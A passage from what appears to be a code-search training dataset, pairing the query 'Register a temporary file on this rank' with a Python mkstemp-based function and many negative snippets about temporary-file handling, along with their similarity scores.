"def _update(self, priority, key):\n i = self._index[key]\n item = self._heap[i]\n old_priority = item.priority\n item.priority = priority\n if priority < old_priority:\n self._sift_up(i)\n else:\n self._sift_down(i)",
"def update(self, paths):\n raise NotImplementedError",
"def do_update(self, line):\n args = shlex.split(line)\n size = len(args)\n db = models.storage.all()\n if size == 0:\n print(\"** class name missing **\")\n elif not args[0] in self.__names:\n print(\"** class doesn't exist **\")\n elif size == 1:\n print(\"** instance id missing **\")\n elif not (args[0] + \".\" + args[1]) in db:\n print(\"** no instance found **\")\n elif size == 2:\n print(\"** attribute name missing **\")\n elif size == 3:\n print(\"** value missing **\")\n else:\n new_dict = db[args[0] + \".\" + args[1]].to_dict()\n val = args[3]\n if self.is_int(val):\n val = int(val)\n elif self.is_float(val):\n val = float(val)\n new_dict[args[2]] = val\n obj = self.__names[args[0]](**new_dict)\n db[args[0] + \".\" + args[1]] = obj\n models.storage.save()",
"def __swap_kv(self, node1, node2):\r\n node1.key, node2.key = node2.key, node1.key\r\n node1.value, node2.value = node2.value, node1.value",
"def update(self, new_data):\n all_keys = [key for key in self.__dict__]\n keys = [key for key in new_data]\n for key in keys:\n if key in all_keys:\n setattr(self, key, new_data[key])\n else:\n return {\n \"message\": \"Error encountered when setting attributes.\",\n \"help\": \"Ensure all fields you're updating are valid.\"\n }\n self.save()",
"def update(self, other):\n # Check if any columns will remain with their original length. If so\n # also check if the lengths of the tables are the same.\n self._dirty = True\n nrows = other.number_of_rows()\n\n if (other._columns and\n set(self._columns) - set(other._columns) and\n other.number_of_rows() != self.number_of_rows()):\n\n raise ValueError('Can not add columns of length {}'\n ' to table of length {}'.format(\n other.number_of_rows(),\n self.number_of_rows()))\n\n for name, column in other._columns.items():\n self._set_column_column_nocheck(name, column, nrows)\n\n self.set_table_attributes(other.get_table_attributes())\n self.set_name(other.get_name())",
"def update(self, other):\n for filter, value in other.items():\n self.__setitem__(filter, value)",
"def update(self, f):\n\n for p in self.__mapper__.attrs:\n\n if p.key == 'oid':\n continue\n try:\n setattr(self, p.key, getattr(f, p.key))\n\n except AttributeError:\n # The dict() method copies data property values into the main dict,\n # and these don't have associated class properties.\n continue",
"def update(self, f):\n\n for p in self.__mapper__.attrs:\n\n if p.key == 'oid':\n continue\n try:\n setattr(self, p.key, getattr(f, p.key))\n\n except AttributeError:\n # The dict() method copies data property values into the main dict,\n # and these don't have associated class properties.\n continue",
"def partition_book(self):\n ...",
"def update(self, instance, validated_data):\n validated_data.pop(\"assignment\", None)\n return super().update(instance, validated_data)",
"def update(self):\n raise NotImplementedError",
"def update(self, xnew, ynew):\n # define old snapshots to be discarded\n xold, yold = self.Xw[:,0], self.Yw[:,0]\n # Update recent w snapshots\n self.Xw = np.column_stack((self.Xw[:,1:], xnew))\n self.Yw = np.column_stack((self.Yw[:,1:], ynew))\n \n # direct rank-2 update\n # define matrices\n U, V = np.column_stack((xold, xnew)), np.column_stack((yold, ynew))\n C = np.diag([-(self.weighting)**(self.w),1])\n # compute PkU matrix matrix product beforehand\n PkU = self.P.dot(U)\n # compute AkU matrix matrix product beforehand\n AkU = self.A.dot(U)\n # compute Gamma\n Gamma = np.linalg.inv(np.linalg.inv(C)+U.T.dot(PkU))\n # update A\n self.A += (V-AkU).dot(Gamma).dot(PkU.T)\n # update P\n self.P = (self.P - PkU.dot(Gamma).dot(PkU.T))/self.weighting\n # ensure P is SPD by taking its symmetric part\n self.P = (self.P + self.P.T)/2\n \n # time step + 1\n self.timestep += 1",
"def update(self, initial, follows):",
"def update(self, new_attrs):\n self.last_update = round(time())\n self.attrs.update(new_attrs)",
"def __swap(self, index1, index2):\n self.heap[index1], self.heap[index2] = self.heap[index2], self.heap[index1]"
] | [
"0.603172",
"0.5819609",
"0.5723665",
"0.56900966",
"0.5662162",
"0.5607183",
"0.55987877",
"0.5512243",
"0.54352087",
"0.53991395",
"0.53937256",
"0.53484046",
"0.532894",
"0.53233975",
"0.5312622",
"0.5310722",
"0.527429",
"0.52614987",
"0.52564377",
"0.5246442",
"0.5220056",
"0.5203469",
"0.51834726",
"0.5143626",
"0.5128264",
"0.5115398",
"0.50941867",
"0.5092263",
"0.5082386",
"0.5068741",
"0.50646913",
"0.5055322",
"0.5055322",
"0.50542766",
"0.5039511",
"0.5022707",
"0.5014317",
"0.4994743",
"0.4993426",
"0.49737975",
"0.49677244",
"0.49373418",
"0.49266034",
"0.49219212",
"0.49073514",
"0.4907322",
"0.49006927",
"0.49003878",
"0.4888662",
"0.48821643",
"0.48818284",
"0.48772162",
"0.4875862",
"0.48624182",
"0.48598674",
"0.48503727",
"0.48495156",
"0.4844537",
"0.48431885",
"0.48358876",
"0.48327196",
"0.48276392",
"0.48201805",
"0.48199844",
"0.48190245",
"0.48149672",
"0.48142973",
"0.48104843",
"0.4804357",
"0.4788147",
"0.477689",
"0.47703344",
"0.47573906",
"0.4755909",
"0.47468758",
"0.4742124",
"0.4734377",
"0.4726497",
"0.4721463",
"0.47157052",
"0.47149414",
"0.4714855",
"0.47143224",
"0.47141275",
"0.4713408",
"0.4712776",
"0.471252",
"0.47106874",
"0.47095585",
"0.4706916",
"0.4700393",
"0.46999758",
"0.46999758",
"0.4699656",
"0.46965623",
"0.46955204",
"0.46938384",
"0.46926263",
"0.46898735",
"0.46878222"
] | 0.5176845 | 23 |
Register a temporary file on this rank that has been created on another rank. | def _register_temporary_file(self):
_partition_file = self._subarray._partition_file
_partition_dir = self._subarray._partition_dir
if _partition_file not in _temporary_files:
fd, _lock_file = mkstemp(
prefix=_partition_file + "_", dir=_partition_dir
)
close(fd)
_temporary_files[_partition_file] = (
_partition_dir,
_lock_file,
set(),
)
else:
_, _lock_file, _ = _temporary_files[_partition_file]
return _lock_file | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def register_tmp_file(self, tmp_file: str):\n self.temp_files.add(pathlib.Path(tmp_file))",
"def set_temp_file(self):\n\n index = self.filename.rfind('/') + 1\n self.temp_filename = self.filename[:index] + \"tmp_\" + self.filename[index:]",
"def add_tempfile(self, filename, exists=True):\n tmp = os.path.abspath(filename)\n if exists and not os.path.exists(tmp):\n raise IOError(\"Temporary file does not exist: \" + tmp)\n self._tempfiles[-1].append(tmp)",
"def TemporaryFile(mode='w+b',bufsize=_1,suffix='',prefix='tmp',dir=None):\n\tpass",
"def _create_file(self, rel_path, text):\n # FIXME: There are better/more secure APIs for creating tmp file paths.\n file_path = self.filesystem.join(self._temp_dir, rel_path)\n self.filesystem.write_text_file(file_path, text)\n return file_path",
"def get_temp_file(self, delete: bool = False, close: bool = False):\n prefix = str(self._tmp_folder / f\"pysimt_{os.getpid()}\")\n t = tempfile.NamedTemporaryFile(\n mode='w', prefix=prefix, delete=delete)\n self.register_tmp_file(t.name)\n if close:\n t.close()\n return t",
"def test_write_file():\n with tempfile.NamedTemporaryFile(delete=False) as t:\n temp_fn = t.name\n try:\n z = XPIManager(temp_fn, mode='w')\n f, d = 'install.rdf', '注目のコレクション'.decode('utf-8')\n z.write(f, d)\n assert z.read(f) == d.encode('utf-8')\n finally:\n os.unlink(temp_fn)",
"def _tempfile(self):\n fd, path = tempfile.mkstemp(dir = os.path.join(self.root, \"temporary\"))\n try:\n return os.fdopen(fd, \"wb\"), path\n except:\n os.unlink(path)\n os.close(fd)\n raise",
"def _temp_file(self, val):\n fd, fn = tempfile.mkstemp()\n fp = os.fdopen(fd, \"wb\")\n if val:\n if not isinstance(val, bytes):\n fp.write(val.encode(\"utf-8\", \"surrogateescape\"))\n else:\n fp.write(val)\n fp.close()\n return fn",
"def _create_unique_file(self):\n with open(self.uniquefile, 'w') as f:\n f.write(self._uniquename)\n self._uniquefile_created = True\n self._extend_expiration_time()\n self._p(\"Unique file created: %s\" % self.uniquefile)",
"def test_create1(self):\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('tmp'))",
"def test_add3(self):\n OUTPUT = open(tempdir + 'add3', 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n TempfileManager.add_tempfile(tempdir + 'add3')",
"def mktmp(self, src, ext='.py'):\n fname = temp_pyfile(src, ext)\n if not hasattr(self, 'tmps'):\n self.tmps=[]\n self.tmps.append(fname)\n self.fname = fname",
"def _tmpfile(self,filename=None):\n\t\tif self._tmpdir is None:\n\t\t\tself._tmpdir = TemporaryDirectory(prefix=\"jitcxde_\")\n\t\t\n\t\tif filename is None:\n\t\t\treturn self._tmpdir.name\n\t\telse:\n\t\t\treturn path.join(self._tmpdir.name, filename)",
"def _tempfile(filename):\n return tempfile.NamedTemporaryFile(mode='w',\n dir=os.path.dirname(filename),\n prefix=os.path.basename(filename),\n suffix=os.fsencode('.tmp'),\n delete=False)",
"def _tmpfile(*args, **kwargs):\n with NamedTemporaryFile(prefix='test_parser', suffix='.tmp', delete=False) as tmp:\n fpath = tmp.name\n fh = open(fpath, *args, **kwargs)\n file_handles.append(fh)\n return fh",
"def new_temp_file(prefix, suffix):\n f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix, delete=False)\n f.close()\n return f.name",
"def new_file(self, *args, **kwargs):\n super().new_file(*args, **kwargs)\n self.file = TemporaryUploadedFile(self.file_name, self.content_type, 0, self.charset, self.content_type_extra)",
"def make_temp_file():\n global TEST_DATA_PATH\n TEST_DATA_PATH = tempfile.mkstemp()",
"def create_temporary_file():\n f = NamedTemporaryFile(delete=False)\n return f.name",
"def _temp_path(self, uri_like):\n handle, filename = tempfile.mkstemp(suffix=uri_like.split(\"/\")[-1])\n os.close(handle)\n return filename",
"def make_temp_file():\n with tempfile.NamedTemporaryFile() as f:\n return f.name",
"def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)",
"def makeFilePointer(self, key, tmppath):\n fp = open(tmppath, 'w')\n self.getFile(key, fp)\n fp.close()",
"def test_unable_to_create_tmp_file(self, mocker):\n mocker.patch(\n 'tempfile.NamedTemporaryFile', side_effect=IOError('Fail')\n )\n\n payload = dict(id=\"stub_id\", data={\"some\": \"data\"})\n resp = self.client.post(self.url, json=payload)\n\n assert resp.status_code == 500\n assert resp.get_json() == {\n 'status': 'Error',\n 'type': 'OSError',\n 'message': 'Error during TAR.GZ creation: Fail'\n }",
"def save_to_tmp(form):\n file = request.files.get('file')\n suffix = os.path.splitext(secure_filename(file.filename))[-1]\n tf = tempfile.NamedTemporaryFile(dir='/tmp', delete=False, suffix=suffix, prefix='lpm_tmp_')\n filepath = tf.name\n tf.close()\n file.save(filepath)\n form.tmpname.data = os.path.basename(filepath)\n return filepath",
"def _create_temp_batch_file(self):\n return tempfile.NamedTemporaryFile(delete=False)",
"def get_temp_file(self, prefix=template, suffix=\"\"):\n ret = NamedTemporaryFile(delete=False, prefix=prefix, suffix=suffix)\n self._tempfiles.append(ret)\n if is_win():\n ret.close()\n return ret",
"def test_create2(self):\n fname = TempfileManager.create_tempfile(prefix='foo')\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('foo'))",
"def test_write(self):\n temp_file = tempfile.mkstemp()[1]\n try:\n with open(temp_file, \"w+\") as fh:\n self.new_manifest.write(fh)\n tools.eq_(self.new_manifest, load_manifest(temp_file))\n finally:\n os.unlink(temp_file)",
"def _tmp(self):\n tmpfn = tempfile.NamedTemporaryFile(prefix='tmp',\n suffix='.out',\n delete=False)\n return tmpfn.name",
"def test_open_write(self, client, remote_temp_dir):\n\n file_path = posixpath.join(remote_temp_dir, \"test2.txt\")\n assert not client.exists(file_path)\n\n with HdfsHook() as hook:\n with hook.open(file_path, \"wb\") as file_:\n file_.write(b\"Test file\\n\")\n\n assert client.exists(file_path)",
"def _testfile():\r\n import tempfile\r\n return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())",
"def newfile(self) :\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\t\tglobal configurer\n\n\t\tfd,name = mkstemp(suffix='.blend')\n\t\tos.close(fd)\n\t\tself.name = name\n\t\tfd = open(name,'wb', configurer.get('ServerBufferSize'))\n\t\tself.fd = fd\n\t\tprint name\n\t\treturn 1",
"def temp_file_name(suffix):\n return 'tmp%s%s' % (uuid.uuid4(), suffix)",
"def tempfile_name():\n ret = os.path.join(tempfile.gettempdir(), 'system_monitor.log')\n if os.access(ret, os.F_OK) and not os.access(ret, os.W_OK):\n print(\"WARNING: Couldn't write to log file {0}: (Permission denied)\".format(ret))\n ret = tempfile.mkstemp(prefix='system_monitor', suffix='.tmp', text=True)\n print(\"Create a new log file: {0}\".format(ret[1]))\n return ret[1]\n\n return ret",
"def missing_but_potential_file():\r\n tempf = tempfile.NamedTemporaryFile()\r\n fname = tempf.name\r\n tempf.close()\r\n return fname",
"def test_add2(self):\n TempfileManager.add_tempfile(tempdir + 'add2', False)",
"def test_append_filehandle(self, tmp_path, mode):\n append_file = tmp_path / \"append.fits\"\n with append_file.open(mode) as handle:\n fits.append(filename=handle, data=np.ones((4, 4)))",
"def temp_file(suffix=\"\"):\n global _temp_dir\n warnings.warn(\n \"Please use the :mod:`tempfile` module from the standard library\",\n DeprecationWarning\n )\n _create_temp_dir()\n if suffix != \"\" and not suffix.startswith(\".\"):\n suffix = \".\" + suffix\n return tempfile.mktemp(suffix=suffix, dir=_temp_dir)",
"def save_torrent_file(filename, torrent_file, username):\n retVal = True\n try:\n with open(UPLOAD_HISTORY, 'a') as uh:\n uh.write(\"{filename}, {username}, {timestamp}\\n\".format(filename=filename, \n username=username, \n timestamp=datetime.datetime.now()))\n torrent_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n except:\n retVal = False\n return retVal",
"def writer(self, size=None):\n data_file = os.path.join(self.put_datadir, self._obj)\n\n # Assume the full directory path exists to the file already, and\n # construct the proper name for the temporary file.\n attempts = 1\n cur_thread = str(getcurrent())\n while True:\n postfix = md5(self._obj + _cur_host + _cur_pid + cur_thread\n + str(random.random())).hexdigest()\n tmpfile = '.' + self._obj + '.' + postfix\n tmppath = os.path.join(self.put_datadir, tmpfile)\n try:\n fd = do_open(tmppath,\n os.O_WRONLY | os.O_CREAT | os.O_EXCL | O_CLOEXEC)\n except GlusterFileSystemOSError as gerr:\n if gerr.errno == errno.ENOSPC:\n # Raise DiskFileNoSpace to be handled by upper layers\n raise DiskFileNoSpace()\n if gerr.errno not in (errno.ENOENT, errno.EEXIST, errno.EIO):\n # FIXME: Other cases we should handle?\n raise\n if attempts >= MAX_OPEN_ATTEMPTS:\n # We failed after N attempts to create the temporary\n # file.\n raise DiskFileError('DiskFile.mkstemp(): failed to'\n ' successfully create a temporary file'\n ' without running into a name conflict'\n ' after %d of %d attempts for: %s' % (\n attempts, MAX_OPEN_ATTEMPTS,\n data_file))\n if gerr.errno == errno.EEXIST:\n # Retry with a different random number.\n attempts += 1\n elif gerr.errno == errno.EIO:\n # FIXME: Possible FUSE issue or race condition, let's\n # sleep on it and retry the operation.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif not self._obj_path:\n # No directory hierarchy and the create failed telling us\n # the container or volume directory does not exist. This\n # could be a FUSE issue or some race condition, so let's\n # sleep a bit and retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif attempts > 1:\n # Got ENOENT after previously making the path. This could\n # also be a FUSE issue or some race condition, nap and\n # retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\" % gerr)\n attempts += 1\n else:\n # It looks like the path to the object does not already\n # exist; don't count this as an attempt, though, since\n # we perform the open() system call optimistically.\n self._create_dir_object(self._obj_path)\n else:\n break\n dw = None\n try:\n # Ensure it is properly owned before we make it available.\n do_fchown(fd, self.uid, self.gid)\n # NOTE: we do not perform the fallocate() call at all. We ignore\n # it completely.\n dw = DiskWriter(self, fd, tmppath, self.threadpool)\n yield dw\n finally:\n try:\n if dw.fd:\n do_close(dw.fd)\n except OSError:\n pass\n if dw.tmppath:\n do_unlink(dw.tmppath)",
"def register_model_file(self, filename):\n # TODO: remember about locking&reading when doing the atomic stuff\n self.model_files.append(filename)\n self.serialize()",
"def test_create1a(self):\n fname = TempfileManager.create_tempfile(dir=tempdir)\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('tmp'))",
"def makeTempFile(self,perms=0o600,keep=False):\n\n fd=os.open(self.temp,os.O_RDWR|os.O_CREAT|os.O_EXCL|os.O_TRUNC,perms)\n f=os.fdopen(fd,'w+') \n if not keep:\n atexit.register(os.remove,self.temp)\n return f",
"def creatercfiletemp(rcfile):\n f = open(rcfile, 'w')\n f.write(rcfile_template)\n f.close()",
"def atomic_open(name, *args, **kwargs):\n basename = os.path.basename(name) + '.tmp.' + uuid1().hex\n # Make sure the tmp file is hidden\n if not basename.startswith('.'):\n basename = '.' + basename\n tmpfile = os.path.join(os.path.dirname(name), basename)\n if os.path.exists(name):\n shutil.copyfile(name, tmpfile)\n with open(tmpfile, *args, **kwargs) as ofile:\n yield ofile\n os.rename(tmpfile, name)",
"def test_create3(self):\n fname = TempfileManager.create_tempfile(suffix='bar')\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.endswith('bar'))",
"def tempfile():\n return mkstemp()[1]",
"def store(self, filename):",
"def tmpfile(tmpdir_factory):\n\n def make(filename):\n fn = tmpdir_factory.mktemp(\"data\").join(filename)\n return fn\n\n # fn = tmpdir_factory.mktemp(\"data\").join(filename)\n return make",
"def save_to_temp(obj, file_name, xml_file, node, hash_id, routine=\"temp_file\"):\n root = xml_file.getroot()\n try:\n output = root.find(\"saved_files\").attrib[\"path\"]\n except KeyError:\n output = None\n if output is not None:\n dir_name = output\n else:\n dir_name = os.path.dirname(file_name)\n parent_name = os.path.basename(dir_name)\n print(\"Saving \" + routine + \" to file\")\n print(\"Output folder: \" + dir_name)\n model_name = root.attrib['name']\n save_folder = \"/saved_files/\" + routine +\"-\"+model_name+ \"_\" +str(hash_id)+ \".bp\"\n\n filename = dir_name+save_folder\n\n relative_path=dir_name+save_folder\n if not os.path.isdir(dir_name+\"/saved_images\"):\n os.mkdir(dir_name+\"/saved_images\")\n for i in plt.get_fignums():\n if i not in saved_already:\n saved_already.append(i)\n Plotting.figure(i)\n save_image_folder = '/saved_images/'+routine+\"-\"+model_name+'-figure%d.png' % i\n Plotting.savefig(dir_name+save_image_folder)\n try:\n Utility.save(obj, filename)\n except IOError:\n os.mkdir(dir_name+\"/saved_files/\")\n Utility.save(obj, filename)\n node.set('path', relative_path)\n root = xml_file.getroot()\n indent(root)\n xml_file.write(file_name)",
"def renameTempGrab(self, url, tag):\n hsh = self.hashOfTempFile()\n ext = url.split(\".\")[-1]\n fname = \"%s.%s.%s.%s\" % (tag, self.timeCode(), hsh[:10], ext)\n if os.path.exists(\"temp.dat\"):\n self.log(\"renaming temp file to: \"+fname)\n os.rename(\"temp.dat\", \"data/\"+fname)\n return fname, hsh, ext",
"def test_create4(self):\n TempfileManager.sequential_files(2)\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertEqual(fname, 'tmp2')\n #\n TempfileManager.unique_files()\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 2)\n fname = os.path.basename(fname)\n self.assertNotEqual(fname, 'tmp3')\n self.assertTrue(fname.startswith('tmp'))",
"def _temporary_resource_file(text, prefix='', suffix=''):\n import tempfile\n\n # Ensure the folder exists\n if not os.path.exists(_temp_path):\n os.mkdir(_temp_path)\n\n try:\n fd, temp_file_path = tempfile.mkstemp(prefix=prefix, suffix=suffix, dir=_temp_path)\n if persist.debug_mode():\n persist.printf(\"{}: created temporary file at {}\".format(p_name, temp_file_path))\n\n try:\n with open(fd, 'w', encoding='utf-8') as f:\n f.write(text)\n temp_file_resource_path = \"/\".join([\"Packages\", _temp_dir_name,\n os.path.basename(temp_file_path)])\n yield temp_file_resource_path\n finally:\n os.remove(temp_file_path)\n except FileNotFoundError:\n _remove_temp_path()\n finally:\n # And remove the folder, if it's empty.\n # Otherwise wait for a \"restart\".\n try:\n os.rmdir(_temp_path)\n except OSError as e:\n if persist.debug_mode():\n persist.printf(\"{}: unable to delete temporary folder; {}\".format(p_name, e))",
"def _get_temp_path(self):\n handle, path = tempfile.mkstemp()\n # windows can't write to a file that is already open by another process\n # (tests use pipe redirection to a log file)\n os.close(handle)\n return path",
"def tests_ti_file_create_2(self):\n metadata = {\n 'size': 84504,\n 'sha256': '33af46377c0e52ca19aea233b3afb64505b32fac2231ec7a8a6795812fae0d10',\n 'md5': 'a9ba66af82897dadb82e3e89c70ae7ac',\n 'sha1': '19d08af69fe15af22ba81f045e31230150d4bdad',\n }\n file_indicator = self.ti.file(**metadata)\n file_indicator.delete()\n\n assert file_indicator.data['sha1'] == metadata['sha1']\n response = file_indicator.create()\n assert response.ok\n unique_id = ':'.join([metadata[x] for x in ['sha256', 'sha1', 'md5']])\n file_indicator = self.ti.file(unique_id=unique_id, **metadata)\n\n assert file_indicator.data['sha256'] == metadata['sha256']\n assert file_indicator.data['sha1'] == metadata['sha1']\n\n response = file_indicator.update()\n assert response.ok\n file_indicator.delete()",
"def test_fileAlreadyExistsNoOverwrite(self):\n fp = FilePath(self.mktemp())\n fp.touch()\n\n self.assertRaises(OSError, self.makeConnectedDccFileReceive, fp.path)",
"def get_temporary_file_name(original_file):\n directory, basename = os.path.split(original_file)\n basename = basename[-MAX_TEMPORARY_FILE_BASENAME_LENGTH:]\n\n random_hex = binascii.b2a_hex(os.urandom(16)).decode('utf-8')\n new_file_path = os.path.join(directory, '%s%s' % (random_hex, basename))\n\n return new_file_path",
"def make_tempfile(content=None, prefix='rbtools.', suffix=None, filename=None):\n if filename is not None:\n tmpdir = make_tempdir()\n tmpfile = os.path.join(tmpdir, filename)\n\n with open(tmpfile, 'wb') as fp:\n if content:\n fp.write(content)\n else:\n with tempfile.NamedTemporaryFile(prefix=prefix,\n suffix=suffix or '',\n delete=False) as fp:\n tmpfile = fp.name\n\n if content:\n fp.write(content)\n\n tempfiles.append(tmpfile)\n\n return tmpfile",
"def test_monitor_correctly_uses_temporary_files(self, _, feed_pages):\n # Arrange\n client = create_autospec(spec=ProQuestAPIClient)\n client.download_all_feed_pages = MagicMock(\n return_value=list(map(fixtures.serialize, feed_pages))\n )\n\n client_factory = create_autospec(spec=ProQuestAPIClientFactory)\n client_factory.create = MagicMock(return_value=client)\n\n monitor = ProQuestOPDS2ImportMonitor(\n client_factory, self._db, self._proquest_collection, ProQuestOPDS2Importer\n )\n monitor.import_one_feed = MagicMock(return_value=([], []))\n\n results = {\"temp_directory\": None, \"temp_files\": []}\n original_mkdtemp = tempfile.mkdtemp\n original_named_temporary_file_constructor = tempfile.NamedTemporaryFile\n original_rmtree = shutil.rmtree\n original_parse_feed = core.opds2_import.parse_feed\n\n def create_temp_directory():\n results[\"temp_directory\"] = original_mkdtemp()\n\n return results[\"temp_directory\"]\n\n def create_temp_file(**kwargs):\n temp_file = original_named_temporary_file_constructor(**kwargs)\n results[\"temp_files\"].append(temp_file.name)\n\n return temp_file\n\n # Act\n with patch(\"tempfile.mkdtemp\") as mkdtemp_mock, patch(\n \"tempfile.NamedTemporaryFile\"\n ) as named_temporary_file_constructor_mock, patch(\n \"shutil.rmtree\"\n ) as rmtree_mock, patch(\n \"api.proquest.importer.parse_feed\"\n ) as parse_feed_mock:\n mkdtemp_mock.side_effect = create_temp_directory\n named_temporary_file_constructor_mock.side_effect = create_temp_file\n rmtree_mock.side_effect = original_rmtree\n parse_feed_mock.side_effect = original_parse_feed\n\n monitor.run_once(False)\n\n # Assert\n # Ensure that the temp directory was successfully created.\n tempfile.mkdtemp.assert_called_once()\n\n # Ensure that the number of created temp files is equal to the number of feed pages.\n tempfile.NamedTemporaryFile.assert_has_calls(\n [call(mode=\"r+\", dir=results[\"temp_directory\"], delete=False)]\n * len(feed_pages)\n )\n\n # Ensure that parse_feed method was called for each feed page.\n parse_feed_mock.assert_has_calls(\n [call(ANY, silent=False)] * len(feed_pages)\n )\n\n # Ensure that the temp directory was successfully removed.\n shutil.rmtree.assert_called_once_with(results[\"temp_directory\"])\n assert False == os.path.exists(results[\"temp_directory\"])",
"def temporary_image(self):\n\n image = Image.new('RGB', (1, 1))\n tmp_file = tempfile.NamedTemporaryFile(suffix='.jpg')\n image.save(tmp_file, 'jpeg')\n # important because after save(),\n # the fp is already at the end of the file\n tmp_file.seek(0) # retrieves the created temp file\n return tmp_file",
"def test_append_filename(self, home_is_temp):\n data = np.arange(6)\n testfile = self.temp(\"test_append_1.fits\")\n\n # Test case 1: creation of file\n fits.append(testfile, data=data, checksum=True)\n\n # Test case 2: append to existing file, with verify=True\n # Also test that additional keyword can be passed to fitsopen\n fits.append(testfile, data=data * 2, checksum=True, ignore_blank=True)\n\n # Test case 3: append to existing file, with verify=False\n fits.append(testfile, data=data * 3, checksum=True, verify=False)\n\n with fits.open(testfile, checksum=True) as hdu1:\n np.testing.assert_array_equal(hdu1[0].data, data)\n np.testing.assert_array_equal(hdu1[1].data, data * 2)\n np.testing.assert_array_equal(hdu1[2].data, data * 3)",
"def setup_output(self, filename=None):\n temp_file_descriptor = None\n if filename is None:\n temp_file_descriptor, filename = mkstemp()\n\n self.filename = filename\n self._temp_file_descriptor = temp_file_descriptor",
"def tempfile_factory(total_length, content_type, filename, file_length):\n # We do need the \"+\" in there for the tempfile module's sake.\n return tempfile.TemporaryFile(\"w+b\")",
"def safe_write_file(self, fn, text):\n fd, tmpfn = mkstemp(dir=self.temp_dir)\n with open(fd, 'wt') as f:\n f.write(text)\n # https://stackoverflow.com/a/2333979\n f.flush()\n os.fsync(f.fileno())\n os.rename(tmpfn, fn)",
"def move_from_temp_directory(self):",
"def register_captured_url_local(filename, url):\n with open(filename, 'a') as f:\n f.write(url + '\\n')",
"def create_file(self, name, content):\n self.files[name] = content",
"def test_add2_dir(self):\n TempfileManager.add_tempfile(tempdir + 'add2', False)",
"def temp_fs_proc(self, temp_fs_proc):\n\n self._temp_fs_proc = temp_fs_proc",
"def create_tempfile(self, suffix=None, prefix=None, text=False, dir=None):\n if suffix is None:\n suffix = ''\n if prefix is None:\n prefix = 'tmp'\n if dir is None:\n dir = self.tempdir\n if dir is None and pyutilib_mngr is not None:\n dir = pyutilib_mngr.tempdir\n if dir is not None:\n deprecation_warning(\n \"The use of the PyUtilib TempfileManager.tempdir \"\n \"to specify the default location for Pyomo \"\n \"temporary files has been deprecated. \"\n \"Please set TempfileManager.tempdir in \"\n \"pyomo.common.tempfiles\", version='5.7.2')\n\n ans = tempfile.mkstemp(suffix=suffix, prefix=prefix, text=text, dir=dir)\n ans = list(ans)\n fname = os.path.abspath(ans[1])\n os.close(ans[0])\n if self._tempfiles[-1].ctr >= 0:\n new_fname = os.path.join(\n os.path.dirname(fname),\n prefix + str(self._tempfiles[-1].ctr) + suffix\n )\n # Delete any file having the sequential name and then\n # rename\n if os.path.exists(new_fname):\n os.remove(new_fname)\n shutil.move(fname, new_fname)\n fname = new_fname\n self._tempfiles[-1].ctr += 1\n self._tempfiles[-1].append(fname)\n return fname",
"def test_add1(self):\n try:\n TempfileManager.add_tempfile(tempdir + 'add1')\n self.fail(\"Expected IOError because file 'add1' does not exist\")\n except IOError:\n pass",
"def _create_file_if_needed(self):\n if not os.path.exists(self._file.filename()):\n old_umask = os.umask(0o177)\n try:\n open(self._file.filename(), 'a+b').close()\n finally:\n os.umask(old_umask)",
"def create(self):\n self.create_file()",
"def upload_location(instance, filename):\n new_id = randint(0, 1000)\n return \"%s/%s\" % (new_id, filename)",
"def _get_tmp_file_path(self):\n return os.path.join(self.tmp_dir, self.hash)",
"def setup_by_filename(self, filename: str):\n self.filename = filename if filename is not None else \"tmp\"\n self.save_file = mcpython.common.world.SaveFile.SaveFile(self.filename)",
"def write_temp_file_to_path(suffix, content, file_path):\n temp_file = NamedTemporaryFile(suffix=suffix)\n temp_file.write(content)\n temp_file.seek(0)\n export_filename = default_storage.save(file_path, File(temp_file, file_path))\n temp_file.close()\n\n return export_filename",
"def generate_temp_filename(self):\n prefix = self.generate_filename_prefix()\n now = datetime.now()\n # Ok that might not be the best timestamp system, but it's\n # enough for our needs.\n timestamp = '-'.join([\n ''.join([str(x) for x in now.timetuple()]),\n str(now.microsecond),\n str(randint(10000, 99999))])\n\n filename = prefix + timestamp\n return find_filename(self.tempdir,\n filename)",
"def save_phantom(self, file_or_fname):\n pass",
"def test_is_special_file_socket(mocker: MockerFixture, tmp_path: Path) -> None:\n mocker.patch(\"stat.S_ISSOCK\", return_value=True)\n tmp_file = tmp_path / \"foo\"\n tmp_file.touch()\n assert is_special_file(tmp_file)",
